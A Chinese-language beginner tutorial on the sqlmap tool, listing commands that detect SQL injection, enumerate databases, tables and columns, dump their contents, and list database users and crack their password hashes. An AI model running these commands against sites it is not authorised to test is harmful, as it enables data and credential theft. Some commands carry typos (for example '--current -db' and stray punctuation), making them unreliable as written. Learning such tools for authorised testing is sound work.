一、SQLMAP入门
1、判断是否存在注入
1sqlmap.py -u 网址/id=1
id=1不可缺少。当注入点后面的参数大于两个时。需要加双引号,
1sqlmap.py -u "网址/id=1&uid=1"
2、判断文本中的请求是否存在注入
从文本中加载http请求,SQLMAP可以从一个文本文件中获取http请求,这样可以不设置其它参数,txt文件中的内容为web数据包。判断是否存在注入的命令:
1sqlmap.py -r desktop/1.txt
3、查询当前用户下的所有数据库
该命令是确定网站存在注入后,用于查询当前用户下的所有数据库。如果当前用户有权限读取包含所有数据库列表信息的表,使用该命令就可以列出所有数据库。
1sqlmap.py -u 网址 --dbs、
当继续注入时,--dbs缩写成-D xxx,其意思是在xxx数据库中继续查询其他数据。
4、获取数据库的表名
该命令的作用是查询完数据库后,查询指定数据库中所有的表名。如果在该命令中不加入-D参数来指定某一个具体的数据库,那么SQLMap会列出数据库中所有库的表。
1sqlmap.py -u "网址“ -D 数据库名 --tables
当继续注入时,--tables缩写成-T,意思时=是在某表中继续查询。
5、获取表中的字段名
该命令的作用是查询完表名后,查询该表中所有的字段名。
1sqlmap.py -u 网址 -D 数据库名 -T 表名 --columns
在后续注入中,--colums缩写成 -C 。
6、获取字段内容
该命令是查询完字段名之后,获取该字段中具体的数据信息。
1sqlmap.py -u 网址 -D 数据库名 -T表名 -C字段名 --dump
7、获取数据库的所有用户
该命令的作用是列出数据库的所有用户。如果当前用户有权限读取包含所有用户的表的权限是,使用该命令就可以列出所有管理用户。
1sqlmap.py -u 网址 --users
8、获取数据库用户的密码
该命令的作用是列出数据库用户的密码。如果当前用户有读取包含用户密码的权限,SQLMAP会先例举出用户,然后列出Hash,并尝试破解。
1sqlmap.py -u 网址 --passwords
9、获取当前网站数据的名称
使用该命令可以列出当前网站使用的数据库
1sqlmap.py -u 网址 --current -db
10、获取当前网站数据库的用户名称
使用该命令可以列出当前网站使用的数据库用户。
1sqlmap.py -u 网址 --current -user
(责任编辑:范老师)